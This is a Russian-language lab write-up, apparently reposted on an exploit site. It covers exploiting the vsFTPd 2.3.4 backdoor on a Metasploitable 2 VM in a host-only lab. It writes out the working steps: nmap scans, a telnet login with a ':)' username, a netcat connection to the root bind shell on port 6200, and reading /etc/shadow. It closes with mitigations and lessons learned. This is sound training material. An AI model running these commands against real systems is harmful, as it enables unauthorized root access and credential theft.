Sploitus

metasploitable2-vsftpd-exploitation

kitploit · 2026-09-04

Exploit Code

MARKDOWN278 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-RINALIYEVA-METASPLOITABLE2-VSFTPD-EXPLOITATION
# Лабораторная работа по эксплуатации vsFTPd 2.3.4 на Metasploitable 2

### Обзор

Этот проект демонстрирует рабочий процесс тестирования на проникновение против намеренно уязвимой машины **Metasploitable 2**. Цель состояла в том, чтобы идентифицировать, эксплуатировать и проанализировать известную уязвимость в FTP-сервисе, в конечном итоге получив **доступ уровня root** и оценив последствия для безопасности.

* * *

### Лабораторная установка

  * **Машина атакующего:** Ubuntu (Виртуальная машина)
  * **Целевая машина:** Metasploitable 2 (Виртуальная машина)
  * **Конфигурация сети:** Сеть только для хоста (`192.168.56.0/24`)



* * *

### Проверка цели

Проверена целевая система и её конфигурация сети:

root@kitploit:~
    
    
    whoami
    hostname
    ifconfig
    

![Проверка настройки цели](https://assets.kitploit.com/production/public/readmes/20156/4e06f0b0949e50f9d545520202763f2be8a733bdfcafa6b5354db4c0fae4387d.png)

* * *

### Проверка связности

Подтверждена сетевая связность между атакующим и целью:

root@kitploit:~
    
    
    ping 192.168.56.101
    

![Проверка связности через ping](https://assets.kitploit.com/production/public/readmes/20156/5e0df00c4e24f429f6c0707e28796d3db236f7786f05d06a4c7c76389290f6cc.png)

* * *

### Цели

  * Выполнить сетевую разведку
  * Определить открытые сервисы
  * Обнаружить уязвимое программное обеспечение
  * Эксплуатировать известную бэкдор-уязвимость
  * Получить доступ root
  * Провести пост-эксплуатационный анализ



* * *

### Используемые инструменты

  * Nmap
  * Telnet
  * Netcat
  * Linux (Виртуальная машина Ubuntu)



* * *

### Краткое описание атаки

  1. Проверена конфигурация цели и связность
  2. Обнаружен целевой хост в локальной сети
  3. Определены открытые порты и доступные сервисы
  4. Обнаружен уязвимый FTP-сервис (`vsFTPd 2.3.4`)
  5. Запущен бэкдор через специально сформированный FTP-логин
  6. Получен root-доступ через bind shell
  7. Выполнена пост-эксплуатационная разведка



* * *

### Разведка

Выполнено обнаружение хостов:

root@kitploit:~
    
    
    nmap -sn 192.168.56.0/24
    

Обнаружены активные хосты в сети.

![Сканирование обнаружения хостов](https://assets.kitploit.com/production/public/readmes/20156/353e0c2b835eacef6269579267eadd138b65d372bf9047d0f2e409280f31abe1.png)

* * *

### Сканирование портов

root@kitploit:~
    
    
    nmap 192.168.56.101
    

Обнаружено несколько открытых портов, включая:

  * 21 (FTP)
  * 22 (SSH)
  * 23 (Telnet)
  * 80 (HTTP)
  * 445 (SMB)



![Результаты сканирования портов](https://assets.kitploit.com/production/public/readmes/20156/1418c82068b6cbb5d709be0b2db0d946800c95ef79edcded9c859fceb4915bfd.png)

* * *

### Определение сервисов

root@kitploit:~
    
    
    nmap -sV 192.168.56.101
    

Обнаружен запущенный FTP-сервис:

root@kitploit:~
    
    
    vsFTPd 2.3.4
    

Полное сканирование сервисов и скриптов включено в вспомогательные файлы: Результаты сканирования Nmap.

![Определение сервисов](https://assets.kitploit.com/production/public/readmes/20156/ea0bb548b3475dd17b699eb9cc347b976943404b4a9aaa2decf6641565b4a000.png)

* * *

### Идентификация уязвимости

FTP-сервис работал на известной уязвимой версии:

**vsFTPd 2.3.4**

Эта версия vsFTPd распространялась с вредоносным бэкдором, который активируется при использовании имени пользователя, содержащего `:)`, во время аутентификации. После активации сервис открывает bind shell на порту **6200** , предоставляя несанкционированный удалённый доступ.

* * *

### Эксплуатация (вручную)

Запущен бэкдор с помощью Telnet:

root@kitploit:~
    
    
    telnet 192.168.56.101 21
    

root@kitploit:~
    
    
    USER test:)
    PASS test
    

![Запуск бэкдора через Telnet](https://assets.kitploit.com/production/public/readmes/20156/8fb8168d2356a95f18fa2550c0aae01c1486b66fb0635395be0677126d07ceff.png)

* * *

### Доступ к оболочке

Подключение к бэкдору через Netcat:

root@kitploit:~
    
    
    nc 192.168.56.101 6200
    

![Подключение к bind shell](https://assets.kitploit.com/production/public/readmes/20156/1ee36706d2831034cc3c19de8b248d828b98322d8d8b136e9c5ffd3bc21207d5.png)

* * *

### Результат

root@kitploit:~
    
    
    whoami
    

root@kitploit:~
    
    
    root
    

Доступ root успешно получен

![Доказательство получения root-доступа](https://assets.kitploit.com/production/public/readmes/20156/e9aba1441e707653c332faeba818f735e40176921d18212cf3cfb0ec8c2f3acd.png)

* * *

### Пост-эксплуатация

После получения root-доступа выполнена базовая разведка системы:

root@kitploit:~
    
    
    cat /etc/passwd
    cat /etc/shadow
    

  * Перечислены системные пользователи и служебные учётные записи
  * Получены хешированные учётные данные из `/etc/shadow`
  * Продемонстрирован доступ к чувствительным системным файлам



![Перечисление пользователей](https://assets.kitploit.com/production/public/readmes/20156/de7934b2d55b48d3517b436d31c2b9237b7d5c28167932cec1df49ea54097ee9.png)

![Доступ к файлу shadow](https://assets.kitploit.com/production/public/readmes/20156/cda51bdf992733dc888f6354b65873b83a3e7408fdc23da994dd44534c61584f.png)

* * *

### Последствия

  * Полная компрометация системы (доступ уровня root)
  * Возможность выполнения произвольных команд
  * Раскрытие чувствительных учётных данных
  * Потенциал для латерального перемещения внутри сети



* * *

### Меры защиты

  * Удалить или отключить FTP-сервис, если он не требуется
  * Обновить уязвимое программное обеспечение до безопасных версий
  * Заменить небезопасные протоколы (например, незашифрованный FTP) безопасными альтернативами (SFTP)
  * Ограничить доступ к критически важным сервисам с помощью правил брандмауэра
  * Внедрить логирование и мониторинг
  * Применять строгую политику аутентификации



* * *

### Вспомогательные файлы

  * Результаты сканирования Nmap



* * *

### Основной вывод

Эта лабораторная работа демонстрирует, как один уязвимый сервис может привести к **полной компрометации системы**. Она подчёркивает важность правильной настройки сервисов, управления обновлениями и минимизации поверхности атаки.

### Что я узнал

Это был мой первый опыт ручной эксплуатации реального бэкдора. Я узнал, как одна строка вредоносного имени пользователя (`:)`) может вызвать root-доступ, что подтвердило, почему разведка сервисов и определение версий так важны. Я также стал более уверенно использовать базовые команды пост-эксплуатации в Linux, такие как чтение `/etc/shadow` и понимание того, как выглядят хешированные учётные данные.

### Ограничения

Это была контролируемая лабораторная среда с использованием Metasploitable 2 – намеренно уязвимой машины. Бэкдор vsFTPd 2.3.4 является известным CVE (CVE-2011-2523) 2011 года, поэтому это не отражает современное реальное тестирование. В реальном задании потребовались бы дополнительные шаги, такие как обход средств защиты, сокрытие логов или перемещение по сети. Этот проект был направлен на понимание основных механизмов эксплуатации, а не на полный тест на проникновение.